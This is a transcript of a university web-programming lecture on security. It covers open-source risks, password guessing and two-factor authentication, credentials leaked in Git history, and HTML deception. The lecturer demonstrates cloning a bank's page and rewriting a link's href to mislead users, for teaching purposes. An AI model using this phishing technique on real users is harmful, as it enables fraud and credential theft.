1 00:00:00,000 --> 00:00:03,920 [MUSIC PLAYING] 2 00:00:03,920 --> 00:00:15,647 3 00:00:15,647 --> 00:00:18,980 BRIAN YU: Welcome back, everyone, to Web Programming with Python and JavaScript, 4 00:00:18,980 --> 00:00:20,510 and welcome to our final lecture. 5 00:00:20,510 --> 00:00:23,180 So we've talked about a lot over the course of web programming 6 00:00:23,180 --> 00:00:24,305 with Python and JavaScript. 7 00:00:24,305 --> 00:00:26,840 Everything from version control to designing 8 00:00:26,840 --> 00:00:29,420 what a web page looks like using HTML and CSS, 9 00:00:29,420 --> 00:00:32,299 and then moving into programming languages like Python and JavaScript 10 00:00:32,299 --> 00:00:34,965 that are used on the server side and on the client side in order 11 00:00:34,965 --> 00:00:37,180 to build and design web applications. 12 00:00:37,180 --> 00:00:39,110 And where I thought we'd conclude today is 13 00:00:39,110 --> 00:00:41,630 by talking a little bit about security, about making sure 14 00:00:41,630 --> 00:00:43,760 that our web applications are secure, thinking 15 00:00:43,760 --> 00:00:46,250 about what sorts of security vulnerabilities 16 00:00:46,250 --> 00:00:48,629 can come about when we're thinking about web applications 17 00:00:48,629 --> 00:00:50,420 and deploying them to the internet, and how 18 00:00:50,420 --> 00:00:53,630 we can best defend against those potential vulnerabilities. 19 00:00:53,630 --> 00:00:56,644 And in doing so, we'll be taking a look back at all of the topics 20 00:00:56,644 --> 00:00:58,560 that we've talked about so far in this course, 21 00:00:58,560 --> 00:01:03,290 going from Git to HTML, to looking at Flask, SQL, our API design, 22 00:01:03,290 --> 00:01:07,130 thinking about programming in JavaScript using Django as a library later on, 23 00:01:07,130 --> 00:01:10,790 testing with continuous integration and continuous deployment, in addition 24 00:01:10,790 --> 00:01:11,720 to scalability. 
25 00:01:11,720 --> 00:01:14,570 And looking through all of these past topics one at a time, 26 00:01:14,570 --> 00:01:17,540 and thinking about where security vulnerabilities might 27 00:01:17,540 --> 00:01:20,570 arise in any of these potential areas, and how we might start 28 00:01:20,570 --> 00:01:22,220 to think about defending against them. 29 00:01:22,220 --> 00:01:24,470 Some of these things will be things we have alluded to 30 00:01:24,470 --> 00:01:27,899 or talked about a little bit over the course of the semester so far. 31 00:01:27,899 --> 00:01:29,690 But today, we'll really take an opportunity 32 00:01:29,690 --> 00:01:31,940 to look at all of these topics in a little more depth 33 00:01:31,940 --> 00:01:36,080 and think about what security vulnerabilities could come up 34 00:01:36,080 --> 00:01:40,084 in the process of dealing with any of these areas within a web program. 35 00:01:40,084 --> 00:01:43,250 So where I thought we'd start is at the very beginning by talking about Git. 36 00:01:43,250 --> 00:01:46,280 So we began the semester by talking about version control using 37 00:01:46,280 --> 00:01:49,037 Git and GitHub, in particular, as a way of hosting code 38 00:01:49,037 --> 00:01:51,620 online in a place where different people from around the world 39 00:01:51,620 --> 00:01:56,250 can have shared access to a repository of code where they can push code to it. 40 00:01:56,250 --> 00:01:59,150 Or they can pull code from it using different branches and features 41 00:01:59,150 --> 00:02:01,880 like pull requests in order to better collaborate on code. 
42 00:02:01,880 --> 00:02:05,594 And GitHub is really built upon this idea of open-source software, 43 00:02:05,594 --> 00:02:07,760 of software where the code isn't hidden from people, 44 00:02:07,760 --> 00:02:11,180 but is available for potentially anyone who wants to to look at that code, 45 00:02:11,180 --> 00:02:15,260 to see that code, and if they want to, propose pull requests or suggestions 46 00:02:15,260 --> 00:02:16,820 or changes to that code. 47 00:02:16,820 --> 00:02:20,120 And so let's think about open-source software just as a high level idea 48 00:02:20,120 --> 00:02:21,050 right now. 49 00:02:21,050 --> 00:02:24,140 What are some security benefits of open-source software, 50 00:02:24,140 --> 00:02:27,020 and what are some potential security concerns that might arise? 51 00:02:27,020 --> 00:02:30,810 52 00:02:30,810 --> 00:02:31,310 Sure. 53 00:02:31,310 --> 00:02:33,884 AUDIENCE: That lots of people can see it on both sides. 54 00:02:33,884 --> 00:02:34,550 BRIAN YU: Great. 55 00:02:34,550 --> 00:02:35,780 Lots of people can see it-- 56 00:02:35,780 --> 00:02:37,190 AUDIENCE: But they'll fix bugs. 57 00:02:37,190 --> 00:02:37,430 BRIAN YU: Right. 58 00:02:37,430 --> 00:02:39,200 And that has implications on both sides of things 59 00:02:39,200 --> 00:02:41,765 when it comes to bugs, which means that when you have a lot of different eyes 60 00:02:41,765 --> 00:02:44,810 all looking at the same code, there's a possibility that someone else might 61 00:02:44,810 --> 00:02:47,460 catch a bug that you missed when you were writing the software. 
62 00:02:47,460 --> 00:02:49,209 But on the flip side of course, if someone 63 00:02:49,209 --> 00:02:51,950 is able to spot a vulnerability in your code by reading it 64 00:02:51,950 --> 00:02:55,158 and they don't tell you about it or any of the other maintainers of the code, 65 00:02:55,158 --> 00:02:57,710 now they're potentially able to take advantage of a security 66 00:02:57,710 --> 00:03:00,440 exploit in your code, something you didn't see coming before. 67 00:03:00,440 --> 00:03:02,690 And something that they wouldn't have otherwise known about 68 00:03:02,690 --> 00:03:04,106 had the code not been open-source. 69 00:03:04,106 --> 00:03:06,266 So open-source software in that sense can sort of 70 00:03:06,266 --> 00:03:09,515 be a double-edged sword where you have to be careful that with a lot of people 71 00:03:09,515 --> 00:03:12,680 all looking at the code, there's potential both for a lot of people 72 00:03:12,680 --> 00:03:15,470 to be able to help you in finding bugs and making security 73 00:03:15,470 --> 00:03:17,570 improvements to your code, but also areas 74 00:03:17,570 --> 00:03:19,540 where there might be vulnerabilities. 75 00:03:19,540 --> 00:03:21,500 And over the course of today, we'll be looking 76 00:03:21,500 --> 00:03:25,430 at some of those potential vulnerabilities that can exist inside 77 00:03:25,430 --> 00:03:28,940 of our web programs and taking a look at how we might 78 00:03:28,940 --> 00:03:31,820 start to try to defend against them. 79 00:03:31,820 --> 00:03:33,890 What other security considerations might come up 80 00:03:33,890 --> 00:03:36,150 when we're using Git and GitHub, in particular? 81 00:03:36,150 --> 00:03:38,150 If we're hosting our code online, you might 82 00:03:38,150 --> 00:03:41,150 think that with open-source software, we might be able to just 83 00:03:41,150 --> 00:03:42,544 make our repositories private. 
84 00:03:42,544 --> 00:03:44,960 So GitHub has the option of making repositories private so 85 00:03:44,960 --> 00:03:47,520 that only certain people have access to your repository. 86 00:03:47,520 --> 00:03:49,770 So not everyone can potentially see it. 87 00:03:49,770 --> 00:03:51,850 But what dangers still might arise there? 88 00:03:51,850 --> 00:03:55,620 89 00:03:55,620 --> 00:03:58,871 Multiple possibilities. 90 00:03:58,871 --> 00:03:59,370 Sure? 91 00:03:59,370 --> 00:04:01,595 AUDIENCE: Someone had access to your GitHub account. 92 00:04:01,595 --> 00:04:02,220 BRIAN YU: Sure. 93 00:04:02,220 --> 00:04:04,094 If someone had access to your GitHub account, 94 00:04:04,094 --> 00:04:05,840 all your code is now stored online. 95 00:04:05,840 --> 00:04:08,000 Which means if some enterprising hacker is 96 00:04:08,000 --> 00:04:09,840 able to somehow gain access to your account, 97 00:04:09,840 --> 00:04:11,700 then they might be able to take advantage of that. 98 00:04:11,700 --> 00:04:13,640 And so for a long time, most websites have 99 00:04:13,640 --> 00:04:15,920 operated under a model of username and password 100 00:04:15,920 --> 00:04:18,079 being the way that you log in to a website. 101 00:04:18,079 --> 00:04:21,500 And increasingly, there are ways that hackers try and bypass 102 00:04:21,500 --> 00:04:23,270 that, by trying to either guess passwords, 103 00:04:23,270 --> 00:04:27,870 by guessing frequently used passwords, or by trying to just guess 104 00:04:27,870 --> 00:04:29,870 many, many different passwords, trying thousands 105 00:04:29,870 --> 00:04:31,786 or millions of different password combinations 106 00:04:31,786 --> 00:04:34,700 in the hopes of at least getting access to some person's account. 
107 00:04:34,700 --> 00:04:37,970 And so if hackers are doing that, trying to guess at passwords very quickly 108 00:04:37,970 --> 00:04:40,250 in order to try and gain access to accounts, what can 109 00:04:40,250 --> 00:04:43,686 web applications do in order to defend against that? 110 00:04:43,686 --> 00:04:45,560 In order to defend against hackers that might 111 00:04:45,560 --> 00:04:49,620 be trying to get into other users' accounts unauthorized. 112 00:04:49,620 --> 00:04:50,120 Sure? 113 00:04:50,120 --> 00:04:53,620 AUDIENCE: They could do things like only so many misses. 114 00:04:53,620 --> 00:04:57,620 You can only have so many wrong or perhaps another kind of authentication, 115 00:04:57,620 --> 00:04:58,240 also. 116 00:04:58,240 --> 00:04:58,580 BRIAN YU: Great. 117 00:04:58,580 --> 00:04:59,960 So different possibilities exist. 118 00:04:59,960 --> 00:05:02,480 One might be placing a limit on the number of times 119 00:05:02,480 --> 00:05:04,340 you can try to log in in any period of time. 120 00:05:04,340 --> 00:05:07,230 Maybe you can only log in, or attempt to log in, five times, 121 00:05:07,230 --> 00:05:08,450 and if you miss five times, then you have 122 00:05:08,450 --> 00:05:11,710 to wait potentially an hour until you're able to log in again, for instance. 123 00:05:11,710 --> 00:05:13,100 So many applications do that. 124 00:05:13,100 --> 00:05:15,900 And then you also talked about other authentication systems. 125 00:05:15,900 --> 00:05:20,970 So what other authentication systems could there be? 126 00:05:20,970 --> 00:05:24,372 AUDIENCE: So like the thing where you get a code pushed to your phone 127 00:05:24,372 --> 00:05:24,974 somehow. 128 00:05:24,974 --> 00:05:25,640 BRIAN YU: Great. 129 00:05:25,640 --> 00:05:27,840 So an increasingly popular form of authentication 130 00:05:27,840 --> 00:05:29,660 now is two-factor authentication. 
131 00:05:29,660 --> 00:05:32,744 The idea that it's not just enough to log in with a username and password, 132 00:05:32,744 --> 00:05:35,410 but you might also want to log in with something else, something 133 00:05:35,410 --> 00:05:37,910 that is physically on you, like a phone for instance. 134 00:05:37,910 --> 00:05:40,250 Where, after you type in your username and password, 135 00:05:40,250 --> 00:05:43,250 a code is texted to your phone, or you use an app on your phone 136 00:05:43,250 --> 00:05:46,440 in order to get a special code, and then you have to type in that code. 137 00:05:46,440 --> 00:05:49,580 So that even if an attacker potentially knows your password, 138 00:05:49,580 --> 00:05:52,220 either by hacking into some database and finding the password 139 00:05:52,220 --> 00:05:54,260 or just by guessing it luckily, they're still 140 00:05:54,260 --> 00:05:56,300 not going to be able to access your account because they still 141 00:05:56,300 --> 00:05:59,460 have this added step of having to go through some two-factor authentication 142 00:05:59,460 --> 00:05:59,960 code. 143 00:05:59,960 --> 00:06:02,510 Where they now need to type in a particular code that 144 00:06:02,510 --> 00:06:05,180 is only available to someone that physically owns the device, 145 00:06:05,180 --> 00:06:06,020 like a phone. 146 00:06:06,020 --> 00:06:08,680 And that can also help to improve security as well. 147 00:06:08,680 --> 00:06:12,030 And so GitHub, for instance, has an opt-in two-factor authentication 148 00:06:12,030 --> 00:06:13,849 where you can enable that for your account 149 00:06:13,849 --> 00:06:15,890 in order to make your GitHub account more secure. 150 00:06:15,890 --> 00:06:18,860 And other websites are increasingly offering two-factor authentication 151 00:06:18,860 --> 00:06:22,430 as well, as just an additional means of trying to secure your accounts. 
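The "special code" from an app on your phone is commonly a time-based one-time password. The sketch below follows the published HOTP/TOTP scheme (RFC 4226 and RFC 6238) using only Python's standard library. The function names `hotp`, `totp`, and `verify`, and the example shared secret, are assumptions made for illustration; this is not a description of how GitHub or any particular site implements its second factor.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """Counter-based one-time code (RFC 4226) using HMAC-SHA1."""
    message = struct.pack(">Q", counter)  # counter as an 8-byte big-endian integer
    digest = hmac.new(secret, message, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F  # dynamic truncation: low 4 bits of the last byte
    number = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(number % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: float = None, step: int = 30, digits: int = 6) -> str:
    """Time-based code (RFC 6238): HOTP over the number of elapsed time steps."""
    if at is None:
        at = time.time()
    return hotp(secret, int(at) // step, digits)


def verify(secret: bytes, submitted: str, at: float = None) -> bool:
    """Compare the submitted code with the expected one in constant time."""
    return hmac.compare_digest(totp(secret, at), submitted)


if __name__ == "__main__":
    shared_secret = b"hypothetical-shared-secret"  # assumed: agreed when 2FA is enabled
    code = totp(shared_secret)                     # what the phone app would display
    print(code, verify(shared_secret, code))
```

Because the server and the phone both hold the same secret and both know the current time, the server can recompute the code and compare. An attacker who only knows the password cannot produce it.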
152 00:06:22,430 --> 00:06:27,420 And web applications are beginning to use that as a security measure as well. 153 00:06:27,420 --> 00:06:30,770 But let's think more broadly, not just about GitHub, but about Git in general, 154 00:06:30,770 --> 00:06:33,080 and this idea of version control and making changes 155 00:06:33,080 --> 00:06:35,060 and committing and saving those changes. 156 00:06:35,060 --> 00:06:38,865 And when we're thinking about pushing our commits to the internet, 157 00:06:38,865 --> 00:06:41,240 taking our changes that we've made in a GitHub repository 158 00:06:41,240 --> 00:06:43,280 and pushing them online, we want to be careful 159 00:06:43,280 --> 00:06:46,670 that sensitive information like a password or an access 160 00:06:46,670 --> 00:06:50,222 token for some service doesn't end up inside of a repository. 161 00:06:50,222 --> 00:06:53,180 Because if it does, then if it gets pushed online regardless of whether 162 00:06:53,180 --> 00:06:56,346 that repository is public or not, then there's a potential that other people 163 00:06:56,346 --> 00:07:00,020 might be able to see that access token when they probably shouldn't. 164 00:07:00,020 --> 00:07:03,710 And so imagine a situation where you're working on a repository. 165 00:07:03,710 --> 00:07:07,430 And you've made some commits and maybe accidentally, you 166 00:07:07,430 --> 00:07:09,410 put a password or some access token that you 167 00:07:09,410 --> 00:07:12,650 didn't mean to inside of one of the files, and you commit that file. 168 00:07:12,650 --> 00:07:15,650 And so credentials have now been exposed in one of the commits inside 169 00:07:15,650 --> 00:07:16,744 of your repository. 170 00:07:16,744 --> 00:07:19,160 And then later on down the line, you realize that mistake. 171 00:07:19,160 --> 00:07:21,860 You realize, oh, wait a minute, I put credentials inside that repository 172 00:07:21,860 --> 00:07:23,450 when I probably shouldn't have. 
173 00:07:23,450 --> 00:07:26,330 And you make another commit removing those credentials from the file. 174 00:07:26,330 --> 00:07:28,770 So you add another commit, removing those credentials. 175 00:07:28,770 --> 00:07:33,110 And now those credentials are no longer in the head of the repository. 176 00:07:33,110 --> 00:07:35,540 You've taken them out, you've committed that removal. 177 00:07:35,540 --> 00:07:38,191 Is that secure? 178 00:07:38,191 --> 00:07:38,690 No. 179 00:07:38,690 --> 00:07:39,689 I see you shaking heads. 180 00:07:39,689 --> 00:07:40,410 Why not? 181 00:07:40,410 --> 00:07:42,560 AUDIENCE: Because you can see all the history. 182 00:07:42,560 --> 00:07:42,830 BRIAN YU: Great. 183 00:07:42,830 --> 00:07:45,860 Because of Git's version control system, the fact that it's saving every time 184 00:07:45,860 --> 00:07:47,870 you make a commit, it's saving your entire history. 185 00:07:47,870 --> 00:07:50,510 Which means that even though-- if you look at all of your files 186 00:07:50,510 --> 00:07:51,800 in their current state now-- 187 00:07:51,800 --> 00:07:55,340 those credentials are not there, anyone who has access to that repository 188 00:07:55,340 --> 00:07:57,230 has access to the full history of commits. 189 00:07:57,230 --> 00:07:59,950 They can go back and look at your previous commit messages, 190 00:07:59,950 --> 00:08:03,200 the previous files you've changed, and what your files looked like every stage 191 00:08:03,200 --> 00:08:04,200 along the way. 192 00:08:04,200 --> 00:08:07,610 And so once you've exposed those credentials, now 193 00:08:07,610 --> 00:08:09,470 even if you make another commit after that, 194 00:08:09,470 --> 00:08:11,250 those credentials are still going to be there. 195 00:08:11,250 --> 00:08:12,666 And so there are ways around this. 
196 00:08:12,666 --> 00:08:16,610 There are ways of reverting back to a previous commit and pruning away all 197 00:08:16,610 --> 00:08:20,270 the extra commits, and then what we would call force pushing those commits 198 00:08:20,270 --> 00:08:21,920 back to GitHub in order to update it. 199 00:08:21,920 --> 00:08:24,404 But generally, once you've pushed code to GitHub, 200 00:08:24,404 --> 00:08:27,320 you might want to imagine all of that code as potentially compromised. 201 00:08:27,320 --> 00:08:29,570 So if you had passwords or security credentials 202 00:08:29,570 --> 00:08:32,270 or other keys inside of your repository that you accidentally 203 00:08:32,270 --> 00:08:35,669 pushed to GitHub, probably a good idea to just exchange those credentials 204 00:08:35,669 --> 00:08:38,510 altogether in order to get new ones because there 205 00:08:38,510 --> 00:08:41,419 is the potential that those credentials could be compromised once 206 00:08:41,419 --> 00:08:42,606 they're pushed. 207 00:08:42,606 --> 00:08:44,480 And so those are some security considerations 208 00:08:44,480 --> 00:08:47,600 that might come about when we're thinking about Git and GitHub. 209 00:08:47,600 --> 00:08:51,184 But let's take a look now to actually writing code and taking a look at HTML. 210 00:08:51,184 --> 00:08:54,100 So HTML, remember we were using in the very beginning of this semester 211 00:08:54,100 --> 00:08:56,990 and all throughout the semester in order to design web pages 212 00:08:56,990 --> 00:09:00,920 and were just consisting of tags where we had our body tags and different tags 213 00:09:00,920 --> 00:09:03,080 for creating lists or creating forms or creating 214 00:09:03,080 --> 00:09:04,980 buttons and so on and so forth. 215 00:09:04,980 --> 00:09:09,270 What security vulnerabilities might come about from just purely HTML? 
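The point about Git history above can be illustrated with a toy model. This is not Git itself: the `Commit` class, the file name `config.py`, and the token value `abc123` are all hypothetical. It is only a minimal sketch of why a later commit that removes a credential does not remove it from earlier snapshots.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Commit:
    """Toy stand-in for a commit: a message plus a snapshot of every file."""
    message: str
    files: dict  # filename -> file contents at this commit


def commits_containing(history, secret):
    """Return the messages of all commits whose snapshot still contains the secret."""
    return [
        commit.message
        for commit in history
        if any(secret in text for text in commit.files.values())
    ]


# Hypothetical history: a token is committed by accident, then removed.
history = [
    Commit("Add config", {"config.py": "API_TOKEN = 'abc123'"}),
    Commit("Remove credentials", {"config.py": "API_TOKEN = os.environ['API_TOKEN']"}),
]
head = history[-1]

if __name__ == "__main__":
    print("In HEAD:", "abc123" in head.files["config.py"])
    print("Still in history:", commits_containing(history, "abc123"))
```

The latest snapshot is clean, but anyone who can read the history can still recover the token from the earlier commit, which is why replacing the exposed credential is the safer response.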
216 00:09:09,270 --> 00:09:13,580 Or how might HTML be used to trick users into doing something 217 00:09:13,580 --> 00:09:17,550 that a malicious attacker might want them to do? 218 00:09:17,550 --> 00:09:18,050 Yeah? 219 00:09:18,050 --> 00:09:24,284 AUDIENCE: In browser, we can see HTML by going to [INAUDIBLE]. 220 00:09:24,284 --> 00:09:24,950 BRIAN YU: Great. 221 00:09:24,950 --> 00:09:28,010 Inside of a browser, for instance, you can inspect a website, 222 00:09:28,010 --> 00:09:29,870 and you can take a look at all of the code. 223 00:09:29,870 --> 00:09:31,590 And so what are the implications of that? 224 00:09:31,590 --> 00:09:35,390 Well, that means that if I wanted to, I could, for instance, go into my browser 225 00:09:35,390 --> 00:09:38,574 and go to, I don't know, bankofamerica.com for instance. 226 00:09:38,574 --> 00:09:41,240 And I could pull up, OK, here's Bank of America's website, which 227 00:09:41,240 --> 00:09:44,570 is really just HTML that's been rendered onto my screen. 228 00:09:44,570 --> 00:09:47,540 And if I wanted to know what code is Bank of America using in order 229 00:09:47,540 --> 00:09:50,090 to make any of this stuff happen, I could reasonably 230 00:09:50,090 --> 00:09:54,060 control click on the site, click on View Page Source, 231 00:09:54,060 --> 00:09:57,464 and what that pulls up for me is a whole bunch of HTML. 232 00:09:57,464 --> 00:10:00,380 It's a whole bunch of it, and I don't really know what all of it does. 233 00:10:00,380 --> 00:10:03,530 But if I just take it all and copy it to my clipboard, 234 00:10:03,530 --> 00:10:07,670 and I go into a text editor and create a new file-- 235 00:10:07,670 --> 00:10:10,670 I'll call it bank.html-- 236 00:10:10,670 --> 00:10:13,310 and I'm just going to paste in all of that code 237 00:10:13,310 --> 00:10:15,530 that I just copied off Bank of America's website. 238 00:10:15,530 --> 00:10:18,405 I didn't have to write any of it, just copied it straight from there. 
239 00:10:18,405 --> 00:10:22,560 Now if I go ahead and open bank.html, this file I just created, 240 00:10:22,560 --> 00:10:24,980 now I've effectively recreated Bank of America's website 241 00:10:24,980 --> 00:10:26,540 just by copying their HTML. 242 00:10:26,540 --> 00:10:29,810 And if I now host this from my own web server, for instance, 243 00:10:29,810 --> 00:10:32,907 I might be able to trick unsuspecting users into thinking that this 244 00:10:32,907 --> 00:10:34,490 is actually Bank of America's website. 245 00:10:34,490 --> 00:10:37,615 Because just at first glance, it looks quite reasonably like the same thing 246 00:10:37,615 --> 00:10:39,530 because it's the exact same HTML. 247 00:10:39,530 --> 00:10:41,420 And if I'm really enterprising, I can think 248 00:10:41,420 --> 00:10:43,753 about actually trying to make modifications to this code 249 00:10:43,753 --> 00:10:48,520 in order to even better be able to try and maliciously take advantage 250 00:10:48,520 --> 00:10:51,020 of a user who might unsuspectingly be arriving at this site, 251 00:10:51,020 --> 00:10:54,650 not realizing that it's not the actual Bank of America website. 252 00:10:54,650 --> 00:10:57,830 I might, for instance, take this Forgot Passcode button 253 00:10:57,830 --> 00:11:00,320 down here-- which is probably a link to some page 254 00:11:00,320 --> 00:11:02,990 where they might type in their email address or try and type 255 00:11:02,990 --> 00:11:05,420 in some new passcode that they want for instance-- 256 00:11:05,420 --> 00:11:08,750 and I might just take this HTML file, and I'll just 257 00:11:08,750 --> 00:11:12,440 search for forgot passcode. 258 00:11:12,440 --> 00:11:13,520 And OK, here it is. 259 00:11:13,520 --> 00:11:14,840 Here's forgot passcode. 
260 00:11:14,840 --> 00:11:19,950 And if we notice, it's located inside of an a tag-- an anchor tag-- 261 00:11:19,950 --> 00:11:23,270 which has this href attribute, which is going 262 00:11:23,270 --> 00:11:26,390 to be where the user is linked to if they were to ever click on 263 00:11:26,390 --> 00:11:28,260 that I forgot my password button. 264 00:11:28,260 --> 00:11:31,940 And so if I take this link, this secure.bankofamerica.com/login 265 00:11:31,940 --> 00:11:36,720 something, and instead of linking to that, link to, I don't know, 266 00:11:36,720 --> 00:11:41,600 https://cs50.github.io/web or whatever other page I want to redirect the user 267 00:11:41,600 --> 00:11:42,740 to. 268 00:11:42,740 --> 00:11:46,479 Now if I refresh the site, it looks like Bank of America's website once again, 269 00:11:46,479 --> 00:11:49,520 but when they go over here and they try and click on this Forgot Passcode 270 00:11:49,520 --> 00:11:52,566 button, now they're taken to our website or whatever website 271 00:11:52,566 --> 00:11:53,690 I want to take the user to. 272 00:11:53,690 --> 00:11:57,350 I can modify the HTML that they have in order to direct them anywhere. 273 00:11:57,350 --> 00:12:00,230 And so that's sort of one of the common ways 274 00:12:00,230 --> 00:12:03,560 that attackers are able to use HTML to try and trick users 275 00:12:03,560 --> 00:12:04,689 into doing something. 276 00:12:04,689 --> 00:12:06,980 In particular, noting the fact that you can take a link 277 00:12:06,980 --> 00:12:08,930 and make it look like it's going anywhere, but really 278 00:12:08,930 --> 00:12:10,638 take the user to somewhere that you want. 
279 00:12:10,638 --> 00:12:15,620 I can have something like this where if I just have a href equals url1-- 280 00:12:15,620 --> 00:12:19,130 where url1 is where I want the user to be taken to 281 00:12:19,130 --> 00:12:23,640 and url2 is just the text that appears to the user-- 282 00:12:23,640 --> 00:12:25,880 then the user might reasonably be tricked 283 00:12:25,880 --> 00:12:30,390 into thinking that they're going to url2 when in reality, they're going to url1. 284 00:12:30,390 --> 00:12:36,970 And so a simple example of that might be inside of link.html here. 285 00:12:36,970 --> 00:12:38,750 We're in link.html. 286 00:12:38,750 --> 00:12:42,140 It's a very simple HTML website, where inside of my body tag, 287 00:12:42,140 --> 00:12:44,870 I have an anchor tag, which is just going to be a link. 288 00:12:44,870 --> 00:12:48,870 And the href of that link is this course's website, for instance. 289 00:12:48,870 --> 00:12:53,870 But in between the a tags, what I have is just google.com, for instance. 290 00:12:53,870 --> 00:12:58,460 And so what that means is that if I were to open up link.html, 291 00:12:58,460 --> 00:13:02,150 for instance, what the user sees is something like this, 292 00:13:02,150 --> 00:13:03,890 a page that just has a link to Google. 293 00:13:03,890 --> 00:13:05,690 And they might reasonably think that clicking on that link 294 00:13:05,690 --> 00:13:08,606 should take them to Google when in fact, when they click on that link, 295 00:13:08,606 --> 00:13:10,950 they're taken here instead, to the course web page. 296 00:13:10,950 --> 00:13:12,866 And so you can imagine how this might actually 297 00:13:12,866 --> 00:13:15,520 be able to be used in order to create potential exploits. 
298 00:13:15,520 --> 00:13:18,470 So that if someone were to take Bank of America's URL, 299 00:13:18,470 --> 00:13:22,910 and I go to link.html and say, all right, we'll put Bank of America here, 300 00:13:22,910 --> 00:13:26,640 and in the href, instead put bank.html, for instance, 301 00:13:26,640 --> 00:13:31,550 which is the link to the file that I created copying Bank of America's code. 302 00:13:31,550 --> 00:13:37,490 Now suddenly, when I open up link.html, I 303 00:13:37,490 --> 00:13:40,190 get a link that looks like it is linking to Bank of America. 304 00:13:40,190 --> 00:13:41,981 I click on that link, and I get a page that 305 00:13:41,981 --> 00:13:43,730 looks like Bank of America's website. 306 00:13:43,730 --> 00:13:46,855 And if I click on forgot my passcode, now I'm redirected to some other site 307 00:13:46,855 --> 00:13:47,390 altogether. 308 00:13:47,390 --> 00:13:51,540 And so these are common ways that exploits 309 00:13:51,540 --> 00:13:54,290 are able to happen by taking advantage of security vulnerabilities 310 00:13:54,290 --> 00:13:57,350 like this where we're really just relying on people not being aware 311 00:13:57,350 --> 00:13:59,510 of the fact that clicking on a link might take them 312 00:13:59,510 --> 00:14:01,477 to somewhere else different altogether. 313 00:14:01,477 --> 00:14:03,560 And so how do you defend against things like this? 314 00:14:03,560 --> 00:14:05,210 Well, one good strategy from the user end 315 00:14:05,210 --> 00:14:07,668 is just to be careful about the links that you're clicking. 316 00:14:07,668 --> 00:14:10,910 In Chrome, for instance, if you hover over a link, down in the lower left, 317 00:14:10,910 --> 00:14:12,279 you can see this-- 318 00:14:12,279 --> 00:14:14,570 it's in small text, so you might not be able to see it, 319 00:14:14,570 --> 00:14:17,519 but this is the actual link that this link is going to be going to. 320 00:14:17,519 --> 00:14:19,310 So you can't always trust what the text is. 
321 00:14:19,310 --> 00:14:22,643 You might want to look very carefully at where that link is actually taking you. 322 00:14:22,643 --> 00:14:26,330 And so these are just some examples of HTML being used in order 323 00:14:26,330 --> 00:14:29,600 to create potential security exploits. 324 00:14:29,600 --> 00:14:31,776 Questions about any of that so far? 325 00:14:31,776 --> 00:14:32,276 Yeah? 326 00:14:32,276 --> 00:14:37,510 AUDIENCE: So why does our browser allow us to see a source 327 00:14:37,510 --> 00:14:38,699 code in the first place? 328 00:14:38,699 --> 00:14:39,740 BRIAN YU: Great question. 329 00:14:39,740 --> 00:14:43,050 Why do web browsers allow us to see the source code in the first place? 330 00:14:43,050 --> 00:14:47,210 Well, in a sense, the web browser, what it's getting is the source code. 331 00:14:47,210 --> 00:14:50,510 So when a web browser is making a request to bankofamerica.com, 332 00:14:50,510 --> 00:14:55,760 for instance, bankofamerica.com needs to give back information to my computer. 333 00:14:55,760 --> 00:14:58,375 And that information needs to be the code, the HTML, 334 00:14:58,375 --> 00:14:59,750 that is going to render the page. 335 00:14:59,750 --> 00:15:03,740 So hypothetically, a browser might be able to just not make it easily 336 00:15:03,740 --> 00:15:05,480 accessible to get to that source code. 337 00:15:05,480 --> 00:15:07,610 But anyone who wants to, if you're really enterprising, 338 00:15:07,610 --> 00:15:10,340 could just look at the information that's coming back from the server. 339 00:15:10,340 --> 00:15:13,200 That information will contain the source code one way or another. 340 00:15:13,200 --> 00:15:15,710 So there's really no way to hide it. 341 00:15:15,710 --> 00:15:16,646 Good question, though. 342 00:15:16,646 --> 00:15:19,611 343 00:15:19,611 --> 00:15:20,110 All right. 
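The mismatch between a link's visible text and its href, as in the link.html example, can also be checked mechanically. The following is a minimal sketch using Python's standard `html.parser` and `urllib.parse` modules. The names `LinkCollector` and `suspicious_links` and the simple domain pattern are assumptions made for illustration, and a real phishing check would need to be far more thorough.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed heuristic: link text that looks like a bare domain or URL.
DOMAIN_LIKE = re.compile(r"^(https?://)?[\w-]+(\.[\w-]+)+(/\S*)?$")


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(value):
    """Host name of a URL or bare domain, without a leading 'www.'."""
    parsed = urlparse(value if "://" in value else "//" + value)
    host = parsed.hostname or ""
    return host[4:] if host.startswith("www.") else host


def suspicious_links(html):
    """Return (text, href) pairs where the text names a different host than the href."""
    collector = LinkCollector()
    collector.feed(html)
    flagged = []
    for href, text in collector.links:
        if not DOMAIN_LIKE.match(text):
            continue  # text such as "click here" makes no claim about a destination
        actual = _host(href) if "://" in href else ""  # relative hrefs have no host
        if _host(text) != actual:
            flagged.append((text, href))
    return flagged


if __name__ == "__main__":
    page = '<body><a href="https://cs50.github.io/web">google.com</a></body>'
    print(suspicious_links(page))
```

This automates the same habit as hovering over a link in the browser: compare where the text claims to go with where the href actually points.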
